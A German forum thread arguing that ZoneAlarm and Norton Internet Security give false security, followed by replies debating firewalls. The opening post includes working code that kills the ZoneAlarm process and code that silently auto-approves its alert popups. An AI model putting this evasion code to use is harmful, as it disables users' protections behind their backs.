Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

zonealarm? norton internet security?

GarfTermy / 19 Antworten / Baumansicht Nickles

in letzter zeit wird öfter gefragt warum zonealarm müll ist. ok... dann werden wir mal etwas zusammentragen.


lesestoff:


http://www.eweek.com/article2/0,4149,1531324,00.asp
http://php.technobabble.com.au/article596.html
http://www.eeye.com/html/Research/Upcoming/20040213-2.html
http://www.computercops.biz/article4839.html
http://www.theregister.co.uk/content/55/31481.html


viel gefährlicher ist aber das hier:


zonealarm killen:


code:--------------------------------------------------------------------------------
Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long


Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub


danach ist zonealarm tot und der "geschützte" rechner bald auch.


neue berechtigungen vergeben?


code:--------------------------------------------------------------------------------
//Diese Procedure drückt den 'Yes' Button des ZoneAlarm-Alarm-Popup-Fensters.
//Am besten, sie wird in einem Timer mit dem kleinst möglichen Zeitintervall ausgeführt.
//So kann man sicher sein, dass das Alarmfenster, wenn es auftaucht sehr schnell,
//und kaum merkbar wieder geschlossen, und mit 'YES' beantwortet wird.


//This Procedure press the 'Yes' button of the ZoneAlarm-Alarming-Popup-Window.
//Best way to use:  write this procedure in your Project-Unit, put a Timer
//                  on your Form and execute the procedure in it with the smallest
//                  Timerintervall.


procedure HackZoneLabsZoneAlarm; //(c) Steve Tricky
var
ZoneAlarmYesButton      :THandle;
ZoneAlarmRememberAnswer :Thandle;
  begin
    try
    //try to find the Buttons on the older Version 2.1.44:
    ZoneAlarmYesButton      := FindWindowEx(findwindow('#32770',nil),0,nil,'&y yes_button');
    ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember the answer each time I use this program.');


    //If Buttons not found, try it with the newer Version 2.6.88:
    If (ZoneAlarmYesButton = 0) or (ZoneAlarmRememberAnswer=0) then
        begin
        ZoneAlarmYesButton      := FindWindowEx(findwindow('#32770',nil),0,nil,'&Yes');
        ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember this answer the next time I use this program.');
        end;


    //If all Buttons are found, and visible: CLICK THEM !
    If (ZoneAlarmYesButton <> 0) and (ZoneAlarmRememberAnswer <> 0) and (IsWindowVisible(ZoneAlarmYesButton)) and (IsWindowVisible(ZoneAlarmRememberAnswer)) then
       begin
       SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONDOWN ,0,0);
       Sleep(10);
       SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONUP ,0,0);
       Sleep(10);
       SendMessage(ZoneAlarmYesButton     , WM_LBUTTONDOWN ,0,0);
       Sleep(10);
       SendMessage(ZoneAlarmYesButton     , WM_LBUTTONUP ,0,0);
       end;


except end;
end;


toll!


nun gibt es diverse viren/würmern/trojanern, die gezielt za killen. natürlich kann man diese software weiter einsetzen - aber sicher kann man damit nicht sein.


nun zu norton...


ein softwareprodukt, was im paket mehrere grundverschiedene funktionen kombiniert - wie zb firewall und virenscanner - nutzt auch diverse programmbibliotheken gemeinsam. als ergebnis setzt sich eine fehlerhafte bibliothek durch alle programmodule als fehler durch. eine teilanwendung macht das gesamtpaket unsicher.
wird ein teil "abgeschossen", sind auch alle anderen teile betroffen.


ist das sicher? nein.


kleine linksammlung zu norton:


http://www.tutorials.de/shop/B0000B3A6N/Norton_Internet_Security_2004_deutsch.html
http://www.eeye.com/html/Research/Upcoming/20040309.html
http://www.rz.tu-ilmenau.de/~traenk/zaweg.htm
http://de.geocities.com/pseueq/y3k.htm


fazit?


sowohl nis, als auch za kann man ruhigen gewissens Nicht empfehlen.


viel spass beim "link"lesen.


;-)


 


 


 

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
gelöscht_35042 GarfTermy „zonealarm? norton internet security?“
Optionen

Hmm..., also irgendwie bekomme ich einfach keinen Virus oder sonstiges drauf. Der zYxel-Router leistet anscheinend gute Dienste. Norton AntiVirus meckert bei jeder verseuchten e-mail. Das neue XP-anti-spy tut's auch ganz gut und spyware-proggis finden auch einfach nix.

Ach ja, das Service Pack 2 für XP habe ich auch noch drauf.

Natürlich sind alle Proggis auf neuestem Stand!!

Ich kann nicht meckern.

luttyy

bei Antwort benachrichtigen
GarfTermy gelöscht_35042 „Hmm..., also irgendwie bekomme ich einfach keinen Virus oder sonstiges drauf....“
Optionen

"...also irgendwie bekomme ich einfach keinen Virus oder sonstiges drauf. ..."

...kein verdienst von za oder nis - sondern eher vom router und dem virenscaner? ja!

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
Andylol GarfTermy „ ...also irgendwie bekomme ich einfach keinen Virus oder sonstiges drauf. ......“
Optionen

Moin,

hi garftermy:

"kein verdienst von za oder nis - sondern eher vom router und .."

--> Ich hoffe doch, der "Auch-Bezug" auf den ROUTER zur Vermeidung von VIREN war eher ein Flüchtigkeitsfehler ;-)

Gruß
Andylol

P.S. Schon die neue c´t gelesen.... da steht etwas über eine Sicherheitslücke von BlackICE drin.. ;-)

bei Antwort benachrichtigen
GarfTermy Andylol „Moin, hi garftermy: kein verdienst von za oder nis - sondern eher vom router und...“
Optionen

"...keinen Virus oder sonstiges drauf..."

sonstiges - kein virus - danke router/firewall
virus - danke virenscanner

(etwas verwirrend am frühen morgen?)

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
GarfTermy Andylol „Moin, hi garftermy: kein verdienst von za oder nis - sondern eher vom router und...“
Optionen

"...P.S. Schon die neue c´t gelesen.... da steht etwas über eine Sicherheitslücke von BlackICE drin...."

noch nicht gelesen, aber ich denke es handelt sich um den fall von vor ca 14 tagen, durch update bereits behoben. ich hatte deswegen schon gepostet. die ct ist da nicht soooo schnell.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
GarfTermy Nachtrag zu: „ ...P.S. Schon die neue c t gelesen.... da steht etwas über eine...“
Optionen

c´t gelesen.

ein wirklich schlechter beitrag, es fehlt jeder nötige hinweis auf die betroffenen versionen und verschweigt auch, das bereits seit wochen entsprechende updates erschienen sind.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
gelöscht_35042 GarfTermy „zonealarm? norton internet security?“
Optionen

Aber der Virenscanner ist von Norton! :)

Den XP habe ich nicht genommen.

luttyy

bei Antwort benachrichtigen
Grossadministrator GarfTermy „zonealarm? norton internet security?“
Optionen

http://www.eweek.com/article2/0,4149,1531324,00.asp
6 Wochen alt, Empfehlung der red: Updaten auf die längst erhältliche neueste Version

http://php.technobabble.com.au/article596.html
6 Wochen alt, Empfehlung der red: Updaten auf die längst erhältliche neueste Version

http://www.eeye.com/html/Research/Upcoming/20040213-2.html

http://www.computercops.biz/article4839.html
6 Wochen alt, Empfehlung der red: Updaten auf die längst erhältliche neueste Version

http://www.theregister.co.uk/content/55/31481.html
Zumindest der letzte link hat nicht wieder die selbe Meldung, sondern eine andere. Die ist aber schon fast ein Jahr alt und damit obsolet.

Nix gegen deinen Hass auf ZA, aber was du da betreibst, ist nicht mehr schön

bei Antwort benachrichtigen
GarfTermy Grossadministrator „ http://www.eweek.com/article2/0,4149,1531324,00.asp 6 Wochen alt, Empfehlung...“
Optionen

"...deinen Hass auf ZA..."

die links sind eher unwichtig - dir ist entgangen, das man za mit "billigen mittel" wirkungslos machen kann.

das ist eine tatsache und hat mit emotionen nichts zu tun.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
Grossadministrator GarfTermy „ ...deinen Hass auf ZA... die links sind eher unwichtig - dir ist entgangen, das...“
Optionen

Dein Posting "klang" aber so. Im Prinzip stimme ich dir ja zu, ZA taugt nicht viel, zwar aus anderen Gründen wie du (Probs mit win2k, XP), dennoch ist mir klar, das die weitaus meisten aller Anwender, seien es nun Hacker, Cracker oder Normalos, nicht in der Lage sind, dieses Programm zu deaktivieren. Jedenfalls ist es der c't im Test mit Würmern und Trojanern, die solches können sollen, nicht gelungen. Der PC-Welt wohl, die haben aber händisch die Registry manipuliert. Wenn du Zugriff auf den PC hast, und die Registry ändern kannst, brauchst du sicherlich kein Programm mehr, das eine Firewall abschießt.
Wie dem auch sei, lass bei deinen Links doch etwas mehr Sorgfalt walten, denn 5 Links, von denen 4 dasselbe schreiben und einer total veraltet ist, das macht keinen guten Eindruck.

bei Antwort benachrichtigen
GarfTermy Grossadministrator „Dein Posting klang aber so. Im Prinzip stimme ich dir ja zu, ZA taugt nicht...“
Optionen

"...Dein Posting "klang" aber so..."

frag einfach nach.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
Andylol Grossadministrator „ http://www.eweek.com/article2/0,4149,1531324,00.asp 6 Wochen alt, Empfehlung...“
Optionen

Moin,

@grossadministrator

"Nix gegen deinen Hass auf ZA, aber was du da betreibst, ist nicht mehr schön "
--> Der "Hass auf ZA" (garftermy) hat nichts mit Hass zu tun, sondern mit nackten Fakten!
Ein Virenscanner, der recht einfach wirkungslos gemacht werden kann... hat nur noch die Schutzwirkung eines Amulettes gegen den bösen Blick :-)

Gruß
Andylol

bei Antwort benachrichtigen
The Wasp GarfTermy „zonealarm? norton internet security?“
Optionen

Es gibt kein sicheres System, auch ein System mit der teuersten Hardware kann geknackt werden. Einziger Hinderungsgrund, daß es Hacker nicht tun, ist strafrechtliche Verfolgung und nicht die so viel gelobte Sicherheit von angeblich sicheren Systemen.
Man stelle ein System auf mit allem was man sich vorstellen kann und lobt eine Belohnung für den erfolgreichen Hack von 10.000.000$ aus: es wäre nur eine Frage der Zeit, daß es heißt, System hijacked. Der einzige Grund, daß Geld auf Banken auch liegen bleibt, sind nicht sichere Systeme sondern Gesetze.
Was das dauernde Theater um die Billigdinger ala ZA und NIS soll, würde ich gern mal wissen. Aber ihr dürft gern weiter auf der Stelle treten...

Ende
bei Antwort benachrichtigen
gelöscht_84526 The Wasp „Es gibt kein sicheres System, auch ein System mit der teuersten Hardware kann...“
Optionen

Das ist so ziemlich der beste Kommentar, der in diesem Zusammenhang auf diesem Brett je geschrieben wurde! Und das meine ich ohne Ironie! Vor allen Dingen der letzte Satz ist sehr aussagekräftig.....

Gruß

bei Antwort benachrichtigen
GarfTermy The Wasp „Es gibt kein sicheres System, auch ein System mit der teuersten Hardware kann...“
Optionen

"...Es gibt kein sicheres System, auch ein System mit der teuersten Hardware kann geknackt werden..."

richtig. aber...

ein kiddy wird mit hoher wahrscheinlichkeit eher in ein leicht zu knackendes oder ungeschütztes system eindringen - darum geht es.

wir reden hier nicht vom professionellen bereich, sonder @home.

professionelle systeme mit wichtigen daten sind in aller regel wesentlich besser geschützt, der aufwand und das wissen diesen schutz zu umgehen ist ungleich höher.

dem privaten user einen pseudoschutz á la za einzureden, kann keine echte sicherheit schaffen - sondern oft eine größere unvorsichtigkeit der user, die sich dann sicher fühlen - aber es eben nicht sind.

hass?

nein.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „zonealarm? norton internet security?“
Optionen

"ein kiddy wird mit hoher wahrscheinlichkeit eher in ein leicht zu knackendes oder ungeschütztes system eindringen - darum geht es."

Die von dir beschriebenen Methoden zur Umgehung von ZA & Co setzen voraus daß man bösartigen Code gestartet hat, in dem Fall hilft dir nicht mal ne HW Firewall.

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „ ein kiddy wird mit hoher wahrscheinlichkeit eher in ein leicht zu knackendes...“
Optionen

falsch.

eine richtige firewall ist ein sicherheitskonzept, was, je nach anforderung, auch die ausführung von ungewolltem code verhindert (..oder solchen code filtert).

beispiele?

* iss proventia m series
* cobion

;-)


;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „falsch. eine richtige firewall ist ein sicherheitskonzept, was, je nach...“
Optionen

"wir reden hier nicht vom professionellen bereich, sonder @home."

Deine Aussage schon wieder vergessen ?

Wenn der Anwender weiss was er anklicken darf und was nicht, dann sind ZA&Co auch nicht unbedingt unsicherer wie deine oben genannten (professionellen) HW Lösungen.

;)

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „ wir reden hier nicht vom professionellen bereich, sonder @home. Deine Aussage...“
Optionen

"...Wenn der Anwender weiss was er anklicken darf und was nicht..."

das setzt oft schon "höhere intelligenz" voraus - die bei vielen nicht vorhanden ist. da schaffen pseudolösungen á la za eine trügerische sicherheit. gerade dann wird heftiger auf "komischen" sites gesurft. ...und poff - ist der rechner kompromittiert.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen